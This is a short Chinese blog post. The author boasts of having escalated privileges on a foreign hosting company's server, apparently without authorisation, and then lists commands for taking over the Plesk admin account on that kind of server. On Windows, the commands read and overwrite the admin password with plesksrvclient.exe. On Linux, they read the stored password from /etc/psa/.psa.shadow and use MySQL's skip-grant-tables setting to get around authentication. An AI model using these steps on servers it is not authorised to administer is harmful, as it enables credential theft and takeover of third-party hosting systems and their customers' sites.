king

重置Plesk的Admin帐号密码提权

king 安全防护 2022-12-31 304浏览 0

前几天提权了个国外的空间商服务器,装的是plesk主机管理系统,以前就知道可以在服务器上直接找回密码,顺手弄了一下,找到了方案,完了直接在IP后面加上8443访问,当然以SSL方式访问哦!

说下Windows 和Linux下的两种方案吧!

登陆到windows,运行如下命令:

C:\Program Files\Swsoft\Plesk\admin\bin\plesksrvclient.exe

即可。

也可以采用命令行方式:

plesksrvclient.exe -get 获取当前密码

plesksrvclient.exe -set 123456 设置新密码为123456

登陆到linux,运行cat /etc/psa/.psa.shadow可以查看到当前密码

重置密码方法

1.编辑/etc/my.cnf

在[mysqld]项下加入skip-grant-tables

重启mysql,执行/etc/init.d/mysqld restart

2.运行/usr/bin/mysql -D mysql -e”update user set password=PASSWORD(‘`cat /etc/psa/.psa.shadow`’) where User=’admin’;”

重置成当前.psa.shadow中的密码。

3.去除skip-grant-tables,重启mysql,完成。

继续浏览有关 安全 的文章
发表评论